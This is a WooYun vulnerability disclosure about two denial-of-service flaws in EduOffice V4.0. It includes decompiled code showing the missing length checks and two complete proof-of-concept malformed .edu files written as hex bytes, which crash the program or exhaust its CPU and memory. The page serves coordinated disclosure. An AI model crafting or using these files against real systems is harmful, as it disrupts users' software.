EduOffice易用办公软件V4.0拒绝服务漏洞 | wooyun-2013-023470| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023470

漏洞标题：EduOffice易用办公软件V4.0拒绝服务漏洞

漏洞作者： cssembly

提交时间：2013-05-29 18:47

修复时间：2013-08-27 18:48

公开时间：2013-08-27 18:48

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-05-29：细节已通知厂商并且等待厂商处理中
2013-06-02：厂商已经确认，细节仅向厂商公开
2013-06-05：细节向第三方安全合作伙伴开放
2013-07-27：细节向核心白帽子及相关领域专家公开
2013-08-06：细节向普通白帽子公开
2013-08-16：细节向实习白帽子公开
2013-08-27：细节向公众公开

简要描述：

手工fuzz了一下EduOffice易用办公软件V4.0，发现在处理图片时，由于未校验数据长度，导致拒绝服务

详细说明：

通过软件生成一个正常的.edu文件，在文件内容中增加图片资源并保存，用二进制编辑器打开保存后的文件，查找图片在文件中位置，通过修改图片数据之前的二进制数据，手工构造畸形数据。运行软件加载构造的畸形文件，引起拒绝服务。
漏洞在EduBrowser401U.ocx模块中，具体函数如下

int __thiscall sub_18DC880(void *this, void *a2, time_t Time)
{
  int v3; // esi@1
  void *v4; // edi@1
  char *v5; // ebx@1
  int v6; // eax@2
  int v7; // ecx@2
  int v8; // eax@3
  int v9; // eax@4
  unsigned int v10; // ecx@4
  int *v11; // eax@6
  DWORD v12; // edi@6
  HGLOBAL v13; // ebp@6
  int v15; // [sp-4h] [bp-40h]@2
  const WCHAR *v16; // [sp+10h] [bp-2Ch]@4
  int v17; // [sp+14h] [bp-28h]@1
  char v18; // [sp+18h] [bp-24h]@1
  int *v19; // [sp+1Ch] [bp-20h]@4
  char v20; // [sp+20h] [bp-1Ch]@6
  int v21; // [sp+38h] [bp-4h]@1
  v3 = (int)a2;
  v4 = this;
  v5 = (char *)this + 4;
  sub_199F078((int)a2, (void **)this + 1);
  sub_18DDE80(v3, Time);
  sub_1889730(&v18);
  v21 = 0;
  sub_1889670(&v17);
  a2 = off_1A0CE74;
  LOBYTE(v21) = 2;
  if ( sub_18DE5B0((char *)v4 + 8) )
  {
    time(&Time);
    v6 = *(_DWORD *)v5;
    v15 = Time;
    sub_19940DF((int)&a2, (size_t)L"Audio%s-%ld", v6);
  }
  else
  {
    v8 = *(_DWORD *)v5;
    v15 = v17;
    sub_19940DF((int)&a2, (size_t)L"Edu%s-%s", v8);
  }
  v15 = v7;
  v19 = &v15;
  sub_1995453(&a2);
  sub_18DE560(v15);
  sub_18DCD00(&v16);
  LOBYTE(v21) = 3;
  sub_199A3ED(v16, 36865);
  v9 = *(_DWORD *)(v3 + 36);
  v10 = *(_DWORD *)(v3 + 40);
  LOBYTE(v21) = 4;
  if ( v9 + 4 > v10 )
    sub_199F490(v3, v9 - v10 + 4);
  v11 = *(int **)(v3 + 0x24);
  v15 = *v11;
  v12 = v15;
  *(_DWORD *)(v3 + 36) = v11 + 1;
  v13 = GlobalAlloc(0x40u, v15);
  sub_199F275(v3, v13, v12);
  sub_199A6A1(v13, v12);
  GlobalFree(v13);
  sub_199A765(&v20);
  LOBYTE(v21) = 3;
  sub_199A48D(&v20);
  LOBYTE(v21) = 2;
  sub_19956E6(&v16);
  LOBYTE(v21) = 1;
  sub_19956E6(&a2);
  LOBYTE(v21) = 0;
  sub_19956E6(&v17);
  v21 = -1;
  return sub_19956E6(&v18);
}

其中v11 = *(int **)(v3 + 0x24);赋值完成后，v11指向从文件中读取的数据缓冲区，通过v15 = *v11取出数据，此处并未校验长度，当v15较大时，会导致 GlobalAlloc(0x40u, v15);函数分配内存失败，而程序并未进行校验，导致在sub_199F275函数中进行数据拷贝时出现异常。
另一处漏洞存在于

int __thiscall sub_18C8630(void *this, int a1)
{
  void *v2; // edi@1
  int v3; // eax@1
  unsigned int v4; // ecx@1
  int v5; // eax@3
  int v6; // ebx@3
  int result; // eax@3
  int Dst; // [sp+Ch] [bp-8h]@4
  int v9; // [sp+10h] [bp-4h]@4
  v2 = this;
  sub_18C84A0();
  v3 = *(_DWORD *)(a1 + 36);
  v4 = *(_DWORD *)(a1 + 40);
  if ( v3 + 4 > v4 )
    sub_199F490(a1, v3 - v4 + 4);
  v5 = *(_DWORD *)(a1 + 36);
  v6 = *(_DWORD *)v5;
  result = v5 + 4;
  *(_DWORD *)(a1 + 36) = result;
  if ( v6 > 0 )
  {
    do
    {
      sub_199F275(a1, &Dst, 8u);
      result = sub_18C83A0(v2, Dst, v9);
      --v6;
    }
    while ( v6 );
  }
  return result;
}

同样的v5 = *(_DWORD *)(a1 + 36)指向从文件中读取的数据，而v6 = *(_DWORD *)v5取出数据后并未做校验，直接当做while循环计数，而sub_18C83A0函数中每一轮都会申请空间，导致程序大量消耗资源。

漏洞证明：

漏洞1的poc.edu文件内容如下

0x45, 0x44, 0x55, 0x4F, 0x46, 0x46, 0x49, 0x43,
    0x45, 0x2D, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0x34, 0x54, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
    0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x24, 0x30, 0x00,
    0x62, 0x00, 0x39, 0x00, 0x63, 0x00, 0x35, 0x00,
    0x65, 0x00, 0x36, 0x00, 0x62, 0x00, 0x2D, 0x00,
    0x63, 0x00, 0x66, 0x00, 0x33, 0x00, 0x63, 0x00,
    0x2D, 0x00, 0x34, 0x00, 0x63, 0x00, 0x63, 0x00,
    0x39, 0x00, 0x2D, 0x00, 0x61, 0x00, 0x31, 0x00,
    0x38, 0x00, 0x33, 0x00, 0x2D, 0x00, 0x34, 0x00,
    0x61, 0x00, 0x63, 0x00, 0x32, 0x00, 0x33, 0x00,
    0x37, 0x00, 0x37, 0x00, 0x61, 0x00, 0x62, 0x00,
    0x36, 0x00, 0x32, 0x00, 0x35, 0x00, 0xD2, 0xA9,
    0xCE, 0x4F, 0x40, 0xF3, 0x21, 0x41, 0x52, 0x47,
    0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0xFF, 0xFE,
    0xFF, 0x4C, 0x45, 0x00, 0x64, 0x00, 0x75, 0x00,
    0x30, 0x00, 0x62, 0x00, 0x39, 0x00, 0x63, 0x00,
    0x35, 0x00, 0x65, 0x00, 0x36, 0x00, 0x62, 0x00,
    0x2D, 0x00, 0x63, 0x00, 0x66, 0x00, 0x33, 0x00,
    0x63, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x63, 0x00,
    0x63, 0x00, 0x39, 0x00, 0x2D, 0x00, 0x61, 0x00,
    0x31, 0x00, 0x38, 0x00, 0x33, 0x00, 0x2D, 0x00,
    0x34, 0x00, 0x61, 0x00, 0x63, 0x00, 0x32, 0x00,
    0x33, 0x00, 0x37, 0x00, 0x37, 0x00, 0x61, 0x00,
    0x62, 0x00, 0x36, 0x00, 0x32, 0x00, 0x35, 0x00,
    0x2D, 0x00, 0x34, 0x00, 0x36, 0x00, 0x61, 0x00,
    0x64, 0x00, 0x66, 0x00, 0x62, 0x00, 0x66, 0x00,
    0x62, 0x00, 0x2D, 0x00, 0x31, 0x00, 0x62, 0x00,
    0x35, 0x00, 0x34, 0x00, 0x2D, 0x00, 0x34, 0x00,
    0x33, 0x00, 0x39, 0x00, 0x36, 0x00, 0x2D, 0x00,
    0x39, 0x00, 0x38, 0x00, 0x32, 0x00, 0x64, 0x00,
    0x2D, 0x00, 0x32, 0x00, 0x30, 0x00, 0x65, 0x00,
    0x63, 0x00, 0x31, 0x00, 0x35, 0x00, 0x33, 0x00,
    0x66, 0x00, 0x64, 0x00, 0x32, 0x00, 0x34, 0x00,
    0x31, 0x00, 0xFF, 0xFE, 0xFF, 0x04, 0x2E, 0x00,
    0x6A, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x83,
    0xA1, 0x92, 0x74, 0xFF, 0xFF, 0xFF, 0xFF, 0x00 
漏洞2的poc2.edu内容如下：
    0x45, 0x44, 0x55, 0x4F, 0x46, 0x46, 0x49, 0x43,
    0x45, 0x2D, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0x4F, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE,
    0xFF, 0x0F, 0x54, 0x00, 0x69, 0x00, 0x6D, 0x00,
    0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x4E, 0x00,
    0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x52, 0x00,
    0x6F, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x6E, 0x00,
    0xD2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
    0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0x1F, 0x01,
    0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x14, 0x00,
    0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x14, 0x00,
    0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
    0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x54, 0x00,
    0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x73, 0x00,
    0x20, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x77, 0x00,
    0x20, 0x00, 0x52, 0x00, 0x6F, 0x00, 0x6D, 0x00,
    0x61, 0x00, 0x6E, 0x00, 0xB4, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x0F, 0x54, 0x00, 0x69, 0x00, 0x6D, 0x00,
    0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x4E, 0x00,
    0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x52, 0x00,
    0x6F, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x6E, 0x00,
    0xB4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x00, 0xFF, 0xFE, 0xFF, 0x00, 0xFF, 0xFE,
    0xFF, 0x0F, 0x54, 0x00, 0x69, 0x00, 0x6D, 0x00,
    0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x4E, 0x00,
    0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x52, 0x00,
    0x6F, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x6E, 0x00,
    0xD2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
    0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x24,
    0x35, 0x00, 0x61, 0x00, 0x34, 0x00, 0x63, 0x00,
    0x33, 0x00, 0x37, 0x00, 0x62, 0x00, 0x66, 0x00,
    0x2D, 0x00, 0x39, 0x00, 0x38, 0x00, 0x30, 0x00,
    0x61, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x66, 0x00,
    0x32, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x39, 0x00,
    0x61, 0x00, 0x39, 0x00, 0x31, 0x00, 0x2D, 0x00,
    0x65, 0x00, 0x36, 0x00, 0x64, 0x00, 0x39, 0x00,
    0x36, 0x00, 0x64, 0x00, 0x63, 0x00, 0x30, 0x00,
    0x36, 0x00, 0x61, 0x00, 0x31, 0x00, 0x63, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x24,
    0x35, 0x00, 0x61, 0x00, 0x34, 0x00, 0x63, 0x00,
    0x33, 0x00, 0x37, 0x00, 0x62, 0x00, 0x66, 0x00,
    0x2D, 0x00, 0x39, 0x00, 0x38, 0x00, 0x30, 0x00,
    0x61, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x66, 0x00,
    0x32, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x39, 0x00,
    0x61, 0x00, 0x39, 0x00, 0x31, 0x00, 0x2D, 0x00,
    0x65, 0x00, 0x36, 0x00, 0x64, 0x00, 0x39, 0x00,
    0x36, 0x00, 0x64, 0x00, 0x63, 0x00, 0x30, 0x00,
    0x36, 0x00, 0x61, 0x00, 0x31, 0x00, 0x63, 0x00,
    0xFF, 0xFE, 0xFF, 0x24, 0x35, 0x00, 0x61, 0x00,
    0x34, 0x00, 0x63, 0x00, 0x33, 0x00, 0x37, 0x00,
    0x62, 0x00, 0x66, 0x00, 0x2D, 0x00, 0x39, 0x00,
    0x38, 0x00, 0x30, 0x00, 0x61, 0x00, 0x2D, 0x00,
    0x34, 0x00, 0x66, 0x00, 0x32, 0x00, 0x64, 0x00,
    0x2D, 0x00, 0x39, 0x00, 0x61, 0x00, 0x39, 0x00,
    0x31, 0x00, 0x2D, 0x00, 0x65, 0x00, 0x36, 0x00,
    0x64, 0x00, 0x39, 0x00, 0x36, 0x00, 0x64, 0x00,
    0x63, 0x00, 0x30, 0x00, 0x36, 0x00, 0x61, 0x00,
    0x31, 0x00, 0x63, 0x00, 0x00, 0x01, 0x00, 0x00,
    0x00, 0x11, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF,
    0xFE, 0xFF, 0x24, 0x66, 0x00, 0x30, 0x00, 0x64,
    0x00, 0x39, 0x00, 0x33, 0x00, 0x65, 0x00, 0x32,
    0x00, 0x32, 0x00, 0x2D, 0x00, 0x39, 0x00, 0x34,
    0x00, 0x33, 0x00, 0x61, 0x00, 0x2D, 0x00, 0x34,
    0x00, 0x37, 0x00, 0x61, 0x00, 0x64, 0x00, 0x2D,
    0x00, 0x61, 0x00, 0x65, 0x00, 0x31, 0x00, 0x35,
    0x00, 0x2D, 0x00, 0x62, 0x00, 0x34, 0x00, 0x34,
    0x00, 0x30, 0x00, 0x37, 0x00, 0x37, 0x00, 0x35,
    0x00, 0x39, 0x00, 0x35, 0x00, 0x32, 0x00, 0x38,
    0x00, 0x33, 0x00, 0x04, 0x00, 0x00, 0x00, 0xE8,
    0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x01, 0x00, 0x00, 0x00, 0x16, 0x00, 0x0C,
    0x30, 0xFF, 0xFE, 0xFF, 0x24, 0x36, 0x00, 0x31,
    0x00, 0x65, 0x00, 0x65, 0x00, 0x64, 0x00, 0x31,
    0x00, 0x39, 0x00, 0x32, 0x00, 0x2D, 0x00, 0x34,
    0x00, 0x32, 0x00, 0x32, 0x00, 0x61, 0x00, 0x2D,
    0x00, 0x34, 0x00, 0x62, 0x00, 0x31, 0x00, 0x66,
    0x00, 0x2D, 0x00, 0x39, 0x00, 0x36, 0x00, 0x38,
    0x00, 0x62, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x35,
    0x00, 0x35, 0x00, 0x33, 0x00, 0x38, 0x00, 0x66,
    0x00, 0x31, 0x00, 0x35, 0x00, 0x34, 0x00, 0x37,
    0x00, 0x64, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x30,
    0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
    0xFF, 0xFF, 0xFF, 0x7F

双击加载第一个文件，程序异常出错

双击加载第二个文件，程序大量占用cpu，同时内存不断增加

修复方案：

版权声明：转载请注明来源 cssembly@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2013-06-02 23:05

厂商回复：

CNVD对所述情况完成机理分析确认，不过距离溢出还有一段距离，时间关系，对于POC未深入研究，已经留存。已经由CNVD在30日下午直接联系上软件生产厂商（北京洲洋伟业信息技术有限公司），协调其处置。
按理论上可能存在的溢出进行评分，rank=7.48*1.1*1.3=10.696

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023470

漏洞标题：EduOffice易用办公软件V4.0拒绝服务漏洞

相关厂商：北京洲洋伟业信息技术有限公司

漏洞作者： cssembly

提交时间：2013-05-29 18:47

修复时间：2013-08-27 18:48

公开时间：2013-08-27 18:48

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 cssembly@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023470

漏洞标题：EduOffice易用办公软件V4.0拒绝服务漏洞

相关厂商：北京洲洋伟业信息技术有限公司

漏洞作者： cssembly

提交时间：2013-05-29 18:47

修复时间：2013-08-27 18:48

公开时间：2013-08-27 18:48

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-023470"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 cssembly@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：